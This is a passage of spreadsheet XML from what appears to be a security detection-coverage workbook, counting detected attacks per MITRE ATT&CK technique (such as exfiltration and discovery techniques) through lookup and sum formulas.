      </c>
      <c r="BY5" s="12">
        <v>1</v>
      </c>
      <c r="BZ5" s="13">
        <v>1</v>
      </c>
      <c r="CA5" s="394">
        <v>2</v>
      </c>
      <c r="CB5" s="292">
        <v>2</v>
      </c>
      <c r="CC5" s="322">
        <v>2</v>
      </c>
      <c r="CD5" s="322" t="s">
        <v>4742</v>
      </c>
      <c r="CE5" s="12">
        <v>1</v>
      </c>
      <c r="CF5" s="12">
        <v>0</v>
      </c>
      <c r="CG5" s="13">
        <v>1</v>
      </c>
      <c r="CH5" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="6" spans="1:93" ht="15" customHeight="1">
      <c r="A6" s="4">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="B6" s="4" t="str">
        <f>IFERROR(VLOOKUP(A6,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1011</v>
      </c>
      <c r="C6" s="493" t="str">
        <f>IFERROR(VLOOKUP(B6,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exfiltration Over Other Network Medium</v>
      </c>
      <c r="D6" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B6)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E6" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F6" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (1)</v>
      </c>
      <c r="G6" s="292"/>
      <c r="H6" s="322"/>
      <c r="I6" s="322"/>
      <c r="J6" s="12"/>
      <c r="K6" s="13"/>
      <c r="L6" s="394"/>
      <c r="M6" s="322"/>
      <c r="N6" s="322"/>
      <c r="O6" s="322"/>
      <c r="P6" s="12"/>
      <c r="Q6" s="13"/>
      <c r="R6" s="394"/>
      <c r="S6" s="292"/>
      <c r="T6" s="322"/>
      <c r="U6" s="322"/>
      <c r="V6" s="12"/>
      <c r="W6" s="13"/>
      <c r="X6" s="394"/>
      <c r="Y6" s="392"/>
      <c r="Z6" s="392"/>
      <c r="AA6" s="322"/>
      <c r="AB6" s="392"/>
      <c r="AC6" s="16"/>
      <c r="AD6" s="394"/>
      <c r="AE6" s="392"/>
      <c r="AF6" s="392"/>
      <c r="AG6" s="322"/>
      <c r="AH6" s="392"/>
      <c r="AI6" s="16"/>
      <c r="AJ6" s="394"/>
      <c r="AK6" s="392"/>
      <c r="AL6" s="392"/>
      <c r="AM6" s="322"/>
      <c r="AN6" s="392"/>
      <c r="AO6" s="16"/>
      <c r="AP6" s="394"/>
      <c r="AQ6" s="292"/>
      <c r="AR6" s="322"/>
      <c r="AS6" s="322"/>
      <c r="AT6" s="12"/>
      <c r="AU6" s="13"/>
      <c r="AV6" s="394"/>
      <c r="AW6" s="392"/>
      <c r="AX6" s="392"/>
      <c r="AY6" s="322"/>
      <c r="BA6" s="16"/>
      <c r="BB6" s="394"/>
      <c r="BC6" s="292"/>
      <c r="BD6" s="322"/>
      <c r="BE6" s="322"/>
      <c r="BF6" s="12"/>
      <c r="BG6" s="13"/>
      <c r="BH6" s="394"/>
      <c r="BI6" s="292">
        <v>0</v>
      </c>
      <c r="BJ6" s="322">
        <v>0</v>
      </c>
      <c r="BK6" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL6" s="12">
        <v>0</v>
      </c>
      <c r="BM6" s="13">
        <v>0</v>
      </c>
      <c r="BN6" s="394">
        <v>0</v>
      </c>
      <c r="BO6" s="292">
        <v>0</v>
      </c>
      <c r="BP6" s="322">
        <v>0</v>
      </c>
      <c r="BQ6" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="BR6" s="12">
        <v>0</v>
      </c>
      <c r="BS6" s="12">
        <v>0</v>
      </c>
      <c r="BT6" s="13">
        <v>0</v>
      </c>
      <c r="BU6" s="394">
        <v>0</v>
      </c>
      <c r="BV6" s="292">
        <v>0</v>
      </c>
      <c r="BW6" s="322">
        <v>0</v>
      </c>
      <c r="BX6" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY6" s="12">
        <v>0</v>
      </c>
      <c r="BZ6" s="13">
        <v>0</v>
      </c>
      <c r="CA6" s="394">
        <v>0</v>
      </c>
      <c r="CB6" s="292">
        <v>0</v>
      </c>
      <c r="CC6" s="322">
        <v>0</v>
      </c>
      <c r="CD6" s="322" t="s">
        <v>4741</v>
      </c>
      <c r="CE6" s="12">
        <v>0</v>
      </c>
      <c r="CF6" s="12">
        <v>0</v>
      </c>
      <c r="CG6" s="13">
        <v>0</v>
      </c>
      <c r="CH6" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:93" ht="15" customHeight="1">
      <c r="A7" s="4">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="B7" s="4" t="str">
        <f>IFERROR(VLOOKUP(A7,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1018</v>
      </c>
      <c r="C7" s="493" t="str">
        <f>IFERROR(VLOOKUP(B7,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Remote System Discovery</v>
      </c>
      <c r="D7" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B7)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E7" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1002</v>
      </c>
      <c r="F7" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (1002)</v>
      </c>
      <c r="G7" s="292"/>
      <c r="H7" s="322"/>
      <c r="I7" s="322"/>
      <c r="J7" s="12"/>
      <c r="K7" s="13"/>
      <c r="L7" s="394"/>
      <c r="M7" s="322"/>
      <c r="N7" s="322"/>
      <c r="O7" s="322"/>
      <c r="P7" s="12"/>
      <c r="Q7" s="13"/>
      <c r="R7" s="394"/>
      <c r="S7" s="292"/>
      <c r="T7" s="322"/>
      <c r="U7" s="322"/>
      <c r="V7" s="12"/>
      <c r="W7" s="13"/>
      <c r="X7" s="394"/>
      <c r="Y7" s="392"/>
      <c r="Z7" s="392"/>
      <c r="AA7" s="322"/>
      <c r="AB7" s="392"/>
      <c r="AC7" s="16"/>
      <c r="AD7" s="394"/>
      <c r="AE7" s="392"/>
      <c r="AF7" s="392"/>
      <c r="AG7" s="322"/>
      <c r="AH7" s="392"/>
      <c r="AI7" s="16"/>
      <c r="AJ7" s="394"/>
      <c r="AK7" s="392"/>
      <c r="AL7" s="392"/>
      <c r="AM7" s="322"/>
      <c r="AN7" s="392"/>
      <c r="AO7" s="16"/>
      <c r="AP7" s="394"/>
      <c r="AQ7" s="292"/>
      <c r="AR7" s="322"/>
      <c r="AS7" s="322"/>
      <c r="AT7" s="12"/>
      <c r="AU7" s="13"/>
      <c r="AV7" s="394"/>
      <c r="AW7" s="392"/>
      <c r="AX7" s="392"/>
      <c r="AY7" s="322"/>
      <c r="BA7" s="16"/>
      <c r="BB7" s="394"/>
      <c r="BC7" s="292"/>
      <c r="BD7" s="322"/>
      <c r="BE7" s="322"/>
      <c r="BF7" s="12"/>
      <c r="BG7" s="13"/>
      <c r="BH7" s="394"/>
      <c r="BI7" s="292">
        <v>0</v>
      </c>
      <c r="BJ7" s="322">
        <v>0</v>
      </c>
      <c r="BK7" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL7" s="12">
        <v>0</v>
      </c>
      <c r="BM7" s="13">
        <v>0</v>
      </c>
      <c r="BN7" s="394">
        <v>0</v>
      </c>
      <c r="BO7" s="292">
        <v>0</v>
      </c>
      <c r="BP7" s="322">
        <v>0</v>
      </c>
      <c r="BQ7" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="BR7" s="12">
        <v>0</v>
      </c>
      <c r="BS7" s="12">
        <v>0</v>
      </c>
      <c r="BT7" s="13">
        <v>0</v>
      </c>
      <c r="BU7" s="394">
        <v>0</v>
      </c>
      <c r="BV7" s="292">
        <v>0</v>
      </c>
      <c r="BW7" s="322">
        <v>0</v>
      </c>
      <c r="BX7" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY7" s="12">
        <v>0</v>
      </c>
      <c r="BZ7" s="13">
        <v>0</v>
      </c>
      <c r="CA7" s="394">
        <v>0</v>
      </c>
      <c r="CB7" s="292">
        <v>0</v>
      </c>
      <c r="CC7" s="322">
        <v>0</v>
      </c>
      <c r="CD7" s="322" t="s">
        <v>4741</v>
      </c>
      <c r="CE7" s="12">
        <v>0</v>
      </c>
      <c r="CF7" s="12">
        <v>0</v>
      </c>
      <c r="CG7" s="13">
        <v>0</v>
      </c>
      <c r="CH7" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:93" ht="15" customHeight="1">
      <c r="A8" s="4">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="B8" s="4" t="str">
        <f>IFERROR(VLOOKUP(A8,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1020</v>
      </c>
      <c r="C8" s="493" t="str">
        <f>IFERROR(VLOOKUP(B8,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Automated Exfiltration</v>
      </c>
      <c r="D8" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B8)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E8" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>26</v>
      </c>
      <c r="F8" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (26)</v>
      </c>
      <c r="G8" s="292"/>
      <c r="H8" s="322"/>
      <c r="I8" s="322"/>
      <c r="J8" s="12"/>
      <c r="K8" s="13"/>
      <c r="L8" s="394"/>
      <c r="M8" s="322"/>
      <c r="N8" s="322"/>
      <c r="O8" s="322"/>
      <c r="P8" s="12"/>
      <c r="Q8" s="13"/>
      <c r="R8" s="394"/>
      <c r="S8" s="292"/>
      <c r="T8" s="322"/>
      <c r="U8" s="322"/>
      <c r="V8" s="12"/>
      <c r="W8" s="13"/>
      <c r="X8" s="394"/>
      <c r="Y8" s="392"/>
      <c r="Z8" s="392"/>
      <c r="AA8" s="322"/>
      <c r="AB8" s="392"/>
      <c r="AC8" s="16"/>
      <c r="AD8" s="394"/>
      <c r="AE8" s="392"/>
      <c r="AF8" s="392"/>
      <c r="AG8" s="322"/>
      <c r="AH8" s="392"/>
      <c r="AI8" s="16"/>
      <c r="AJ8" s="394"/>
      <c r="AK8" s="392"/>
      <c r="AL8" s="392"/>
      <c r="AM8" s="322"/>
      <c r="AN8" s="392"/>
      <c r="AO8" s="16"/>
      <c r="AP8" s="394"/>
      <c r="AQ8" s="292"/>
      <c r="AR8" s="322"/>
      <c r="AS8" s="322"/>
      <c r="AT8" s="12"/>
      <c r="AU8" s="13"/>
      <c r="AV8" s="394"/>
      <c r="AW8" s="392"/>
      <c r="AX8" s="392"/>
      <c r="AY8" s="322"/>
      <c r="BA8" s="16"/>
      <c r="BB8" s="394"/>
      <c r="BC8" s="292"/>
      <c r="BD8" s="322"/>
      <c r="BE8" s="322"/>
      <c r="BF8" s="12"/>
      <c r="BG8" s="13"/>
      <c r="BH8" s="394"/>
      <c r="BI8" s="292">
        <v>0</v>
      </c>
      <c r="BJ8" s="322">
        <v>0</v>
      </c>
      <c r="BK8" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL8" s="12">
        <v>0</v>
      </c>
      <c r="BM8" s="13">
        <v>0</v>
      </c>
      <c r="BN8" s="394">
        <v>0</v>
      </c>
      <c r="BO8" s="292">
        <v>47</v>
      </c>
      <c r="BP8" s="322">
        <v>20</v>
      </c>
      <c r="BQ8" s="322" t="str">
        <f t="shared" si="1"/>
        <v>20 (47)</v>
      </c>
      <c r="BR8" s="12">
        <v>0</v>
      </c>
      <c r="BS8" s="12">
        <v>3</v>
      </c>
      <c r="BT8" s="13">
        <v>1</v>
      </c>
      <c r="BU8" s="394">
        <v>20</v>
      </c>
      <c r="BV8" s="292">
        <v>0</v>
      </c>
      <c r="BW8" s="322">
        <v>0</v>
      </c>
      <c r="BX8" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY8" s="12">
        <v>0</v>
      </c>
      <c r="BZ8" s="13">
        <v>0</v>
      </c>
      <c r="CA8" s="394">
        <v>0</v>
      </c>
      <c r="CB8" s="292">
        <v>0</v>
      </c>
      <c r="CC8" s="322">
        <v>0</v>
      </c>
      <c r="CD8" s="322" t="s">
        <v>4741</v>
      </c>
      <c r="CE8" s="12">
        <v>0</v>
      </c>
      <c r="CF8" s="12">
        <v>0</v>
      </c>
      <c r="CG8" s="13">
        <v>0</v>
      </c>
      <c r="CH8" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:93" ht="15" customHeight="1">
      <c r="A9" s="4">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
      <c r="B9" s="4" t="str">
        <f>IFERROR(VLOOKUP(A9,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1021</v>
      </c>
      <c r="C9" s="493" t="str">
        <f>IFERROR(VLOOKUP(B9,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Remote Services</v>
      </c>
      <c r="D9" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B9)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E9" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F9" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (1)</v>
      </c>
      <c r="G9" s="292"/>
      <c r="H9" s="322"/>
      <c r="I9" s="322"/>
      <c r="J9" s="12"/>
      <c r="K9" s="13"/>
      <c r="L9" s="394"/>
      <c r="M9" s="322"/>
      <c r="N9" s="322"/>
      <c r="O9" s="322"/>
      <c r="P9" s="12"/>
      <c r="Q9" s="13"/>
      <c r="R9" s="394"/>
      <c r="S9" s="292"/>
      <c r="T9" s="322"/>
      <c r="U9" s="322"/>
      <c r="V9" s="12"/>
      <c r="W9" s="13"/>
      <c r="X9" s="394"/>
      <c r="Y9" s="392"/>
      <c r="Z9" s="392"/>
      <c r="AA9" s="322"/>
      <c r="AB9" s="392"/>
      <c r="AC9" s="16"/>
      <c r="AD9" s="394"/>
      <c r="AE9" s="392"/>
      <c r="AF9" s="392"/>
      <c r="AG9" s="322"/>
      <c r="AH9" s="392"/>
      <c r="AI9" s="16"/>
      <c r="AJ9" s="394"/>
      <c r="AK9" s="392"/>
      <c r="AL9" s="392"/>
      <c r="AM9" s="322"/>
      <c r="AN9" s="392"/>
      <c r="AO9" s="16"/>
      <c r="AP9" s="394"/>
      <c r="AQ9" s="292"/>
      <c r="AR9" s="322"/>
      <c r="AS9" s="322"/>
      <c r="AT9" s="12"/>
      <c r="AU9" s="13"/>
      <c r="AV9" s="394"/>
      <c r="AW9" s="392"/>
      <c r="AX9" s="392"/>
      <c r="AY9" s="322"/>
      <c r="BA9" s="16"/>
      <c r="BB9" s="394"/>
      <c r="BC9" s="292"/>
      <c r="BD9" s="322"/>
      <c r="BE9" s="322"/>
      <c r="BF9" s="12"/>
      <c r="BG9" s="13"/>
      <c r="BH9" s="394"/>
      <c r="BI9" s="292">
        <v>0</v>
      </c>
      <c r="BJ9" s="322">
        <v>0</v>
      </c>
      <c r="BK9" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL9" s="12">
        <v>0</v>
      </c>
      <c r="BM9" s="13">
        <v>0</v>
      </c>
      <c r="BN9" s="394">
        <v>0</v>
      </c>
      <c r="BO9" s="292">
        <v>1</v>
      </c>
      <c r="BP9" s="322">
        <v>1</v>
      </c>
      <c r="BQ9" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="BR9" s="12">
        <v>0</v>
      </c>
      <c r="BS9" s="12">
        <v>1</v>
      </c>
      <c r="BT9" s="13">
        <v>1</v>
      </c>
      <c r="BU9" s="394">
        <v>1</v>
      </c>
      <c r="BV9" s="292">
        <v>0</v>
      </c>
      <c r="BW9" s="322">
        <v>0</v>
      </c>
      <c r="BX9" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY9" s="12">
        <v>0</v>
      </c>
      <c r="BZ9" s="13">
        <v>0</v>
      </c>
      <c r="CA9" s="394">
        <v>0</v>
      </c>
      <c r="CB9" s="292">
        <v>0</v>
      </c>
      <c r="CC9" s="322">
        <v>0</v>
      </c>
      <c r="CD9" s="322" t="s">
        <v>4741</v>
      </c>
      <c r="CE9" s="12">
        <v>0</v>
      </c>
      <c r="CF9" s="12">
        <v>0</v>
      </c>
      <c r="CG9" s="13">
        <v>0</v>
      </c>
      <c r="CH9" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="1:93" ht="15" customHeight="1">
      <c r="A10" s="4">
        <f t="shared" si="3"/>
        <v>8</v>
      </c>
      <c r="B10" s="4" t="str">
        <f>IFERROR(VLOOKUP(A10,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1029</v>
      </c>
      <c r="C10" s="493" t="str">
        <f>IFERROR(VLOOKUP(B10,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Scheduled Transfer</v>
      </c>
      <c r="D10" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B10)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E10" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>9</v>
      </c>
      <c r="F10" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (9)</v>
      </c>
      <c r="G10" s="292"/>
      <c r="H10" s="322"/>
      <c r="I10" s="322"/>
      <c r="J10" s="12"/>
      <c r="K10" s="13"/>
      <c r="L10" s="394"/>
      <c r="M10" s="322"/>
      <c r="N10" s="322"/>
      <c r="O10" s="322"/>
      <c r="P10" s="12"/>
      <c r="Q10" s="13"/>
      <c r="R10" s="394"/>
      <c r="S10" s="292"/>
      <c r="T10" s="322"/>
      <c r="U10" s="322"/>
      <c r="V10" s="12"/>
      <c r="W10" s="13"/>
      <c r="X10" s="394"/>
      <c r="Y10" s="392"/>
      <c r="Z10" s="392"/>
      <c r="AA10" s="322"/>
      <c r="AB10" s="392"/>
      <c r="AC10" s="16"/>
      <c r="AD10" s="394"/>
      <c r="AE10" s="392"/>
      <c r="AF10" s="392"/>
      <c r="AG10" s="322"/>
      <c r="AH10" s="392"/>
      <c r="AI10" s="16"/>
      <c r="AJ10" s="394"/>
      <c r="AK10" s="392"/>
      <c r="AL10" s="392"/>
      <c r="AM10" s="322"/>
      <c r="AN10" s="392"/>
      <c r="AO10" s="16"/>
      <c r="AP10" s="394"/>
      <c r="AQ10" s="292"/>
      <c r="AR10" s="322"/>
      <c r="AS10" s="322"/>
      <c r="AT10" s="12"/>
      <c r="AU10" s="13"/>
      <c r="AV10" s="394"/>
      <c r="AW10" s="392"/>
      <c r="AX10" s="392"/>
      <c r="AY10" s="322"/>
      <c r="BA10" s="16"/>
      <c r="BB10" s="394"/>
      <c r="BC10" s="292"/>
      <c r="BD10" s="322"/>
      <c r="BE10" s="322"/>
      <c r="BF10" s="12"/>
      <c r="BG10" s="13"/>
      <c r="BH10" s="394"/>
      <c r="BI10" s="292">
        <v>0</v>
      </c>
      <c r="BJ10" s="322">
        <v>0</v>
      </c>
      <c r="BK10" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL10" s="12">
        <v>0</v>
      </c>
      <c r="BM10" s="13">
        <v>0</v>
      </c>
      <c r="BN10" s="394">
        <v>0</v>
      </c>
      <c r="BO10" s="292">
        <v>7</v>
      </c>
      <c r="BP10" s="322">
        <v>7</v>
      </c>
      <c r="BQ10" s="322" t="str">
        <f t="shared" si="1"/>
        <v>7 (7)</v>
      </c>
      <c r="BR10" s="12">
        <v>0</v>
      </c>
      <c r="BS10" s="12">
        <v>3</v>
      </c>
      <c r="BT10" s="13">
        <v>1</v>
      </c>
      <c r="BU10" s="394">
        <v>7</v>
      </c>
      <c r="BV10" s="292">
        <v>1</v>
      </c>
      <c r="BW10" s="322">
        <v>1</v>
      </c>
      <c r="BX10" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (1)</v>
      </c>
      <c r="BY10" s="12">
        <v>1</v>
      </c>
      <c r="BZ10" s="13">
        <v>1</v>
      </c>
      <c r="CA10" s="394">
        <v>1</v>
      </c>
      <c r="CB10" s="292">
        <v>1</v>
      </c>
      <c r="CC10" s="322">
        <v>1</v>
      </c>
      <c r="CD10" s="322" t="s">
        <v>2496</v>
      </c>
      <c r="CE10" s="12">
        <v>1</v>
      </c>
      <c r="CF10" s="12">
        <v>0</v>
      </c>
      <c r="CG10" s="13">
        <v>1</v>
      </c>
      <c r="CH10" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:93" ht="15" customHeight="1">
      <c r="A11" s="4">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
      <c r="B11" s="4" t="str">
        <f>IFERROR(VLOOKUP(A11,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1030</v>
      </c>
      <c r="C11" s="493" t="str">
        <f>IFERROR(VLOOKUP(B11,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data Transfer Size Limits</v>
      </c>
      <c r="D11" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B11)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E11" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>68</v>
      </c>
      <c r="F11" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (68)</v>
      </c>
      <c r="G11" s="292"/>
      <c r="H11" s="322"/>
      <c r="I11" s="322"/>
      <c r="J11" s="12"/>
      <c r="K11" s="13"/>
      <c r="L11" s="394"/>
      <c r="M11" s="322"/>
      <c r="N11" s="322"/>
      <c r="O11" s="322"/>
      <c r="P11" s="12"/>
      <c r="Q11" s="13"/>
      <c r="R11" s="394"/>
      <c r="S11" s="292"/>
      <c r="T11" s="322"/>
      <c r="U11" s="322"/>
      <c r="V11" s="12"/>
      <c r="W11" s="13"/>
      <c r="X11" s="394"/>
      <c r="Y11" s="392"/>
      <c r="Z11" s="392"/>
      <c r="AA11" s="322"/>
      <c r="AB11" s="392"/>
      <c r="AC11" s="16"/>
      <c r="AD11" s="394"/>
      <c r="AE11" s="392"/>
      <c r="AF11" s="392"/>
      <c r="AG11" s="322"/>
      <c r="AH11" s="392"/>
      <c r="AI11" s="16"/>
      <c r="AJ11" s="394"/>
      <c r="AK11" s="392"/>
      <c r="AL11" s="392"/>
      <c r="AM11" s="322"/>
      <c r="AN11" s="392"/>
      <c r="AO11" s="16"/>
      <c r="AP11" s="394"/>
      <c r="AQ11" s="292"/>
      <c r="AR11" s="322"/>
      <c r="AS11" s="322"/>
      <c r="AT11" s="12"/>
      <c r="AU11" s="13"/>
      <c r="AV11" s="394"/>
      <c r="AW11" s="392"/>
      <c r="AX11" s="392"/>
      <c r="AY11" s="322"/>
      <c r="BA11" s="16"/>
      <c r="BB11" s="394"/>
      <c r="BC11" s="292"/>
      <c r="BD11" s="322"/>
      <c r="BE11" s="322"/>
      <c r="BF11" s="12"/>
      <c r="BG11" s="13"/>
      <c r="BH11" s="394"/>
      <c r="BI11" s="292">
        <v>9</v>
      </c>
      <c r="BJ11" s="322">
        <v>5</v>
      </c>
      <c r="BK11" s="322" t="str">
        <f t="shared" si="0"/>
        <v>5 (9)</v>
      </c>
      <c r="BL11" s="12">
        <v>2</v>
      </c>
      <c r="BM11" s="13">
        <v>1</v>
      </c>
      <c r="BN11" s="394">
        <v>5</v>
      </c>
      <c r="BO11" s="292">
        <v>62</v>
      </c>
      <c r="BP11" s="322">
        <v>33</v>
      </c>
      <c r="BQ11" s="322" t="str">
        <f t="shared" si="1"/>
        <v>33 (62)</v>
      </c>
      <c r="BR11" s="12">
        <v>2</v>
      </c>
      <c r="BS11" s="12">
        <v>3</v>
      </c>
      <c r="BT11" s="13">
        <v>1</v>
      </c>
      <c r="BU11" s="394">
        <v>33</v>
      </c>
      <c r="BV11" s="292">
        <v>0</v>
      </c>
      <c r="BW11" s="322">
        <v>0</v>
      </c>
      <c r="BX11" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY11" s="12">
        <v>0</v>
      </c>
      <c r="BZ11" s="13">
        <v>0</v>
      </c>
      <c r="CA11" s="394">
        <v>0</v>
      </c>
      <c r="CB11" s="292">
        <v>0</v>
      </c>
      <c r="CC11" s="322">
        <v>0</v>
      </c>
      <c r="CD11" s="322" t="s">
        <v>4741</v>
      </c>
      <c r="CE11" s="12">
        <v>0</v>
      </c>
      <c r="CF11" s="12">
        <v>0</v>
      </c>
      <c r="CG11" s="13">
        <v>0</v>
      </c>
      <c r="CH11" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:93" ht="15" customHeight="1">
      <c r="A12" s="4">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
      <c r="B12" s="4" t="str">
        <f>IFERROR(VLOOKUP(A12,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1033</v>
      </c>
      <c r="C12" s="493" t="str">
        <f>IFERROR(VLOOKUP(B12,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>System Owner/User Discovery</v>
      </c>
      <c r="D12" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B12)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E12" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>13</v>
      </c>
      <c r="F12" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (13)</v>
      </c>
      <c r="G12" s="292"/>
      <c r="H12" s="322"/>
      <c r="I12" s="322"/>
      <c r="J12" s="12"/>
      <c r="K12" s="13"/>
      <c r="L12" s="394"/>
      <c r="M12" s="322"/>
      <c r="N12" s="322"/>
      <c r="O12" s="322"/>
      <c r="P12" s="12"/>
      <c r="Q12" s="13"/>
      <c r="R12" s="394"/>
      <c r="S12" s="292"/>
      <c r="T12" s="322"/>
      <c r="U12" s="322"/>
      <c r="V12" s="12"/>
      <c r="W12" s="13"/>
      <c r="X12" s="394"/>
      <c r="Y12" s="392"/>
      <c r="Z12" s="392"/>
      <c r="AA12" s="322"/>
      <c r="AB12" s="392"/>
      <c r="AC12" s="16"/>
      <c r="AD12" s="394"/>
      <c r="AE12" s="392"/>
      <c r="AF12" s="392"/>
      <c r="AG12" s="322"/>
      <c r="AH12" s="392"/>
      <c r="AI12" s="16"/>
      <c r="AJ12" s="394"/>
      <c r="AK12" s="392"/>
      <c r="AL12" s="392"/>
      <c r="AM12" s="322"/>
      <c r="AN12" s="392"/>
      <c r="AO12" s="16"/>
      <c r="AP12" s="394"/>
      <c r="AQ12" s="292"/>
      <c r="AR12" s="322"/>
      <c r="AS12" s="322"/>
      <c r="AT12" s="12"/>
      <c r="AU12" s="13"/>
      <c r="AV12" s="394"/>
      <c r="AW12" s="392"/>
      <c r="AX12" s="392"/>
      <c r="AY12" s="322"/>
      <c r="BA12" s="16"/>
      <c r="BB12" s="394"/>
      <c r="BC12" s="292"/>
      <c r="BD12" s="322"/>
      <c r="BE12" s="322"/>
      <c r="BF12" s="12"/>
      <c r="BG12" s="13"/>
      <c r="BH12" s="394"/>
      <c r="BI12" s="292">
        <v>0</v>
      </c>
      <c r="BJ12" s="322">
        <v>0</v>
      </c>
      <c r="BK12" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL12" s="12">
        <v>0</v>
      </c>
      <c r="BM12" s="13">
        <v>0</v>
      </c>
      <c r="BN12" s="394">
        <v>0</v>
      </c>
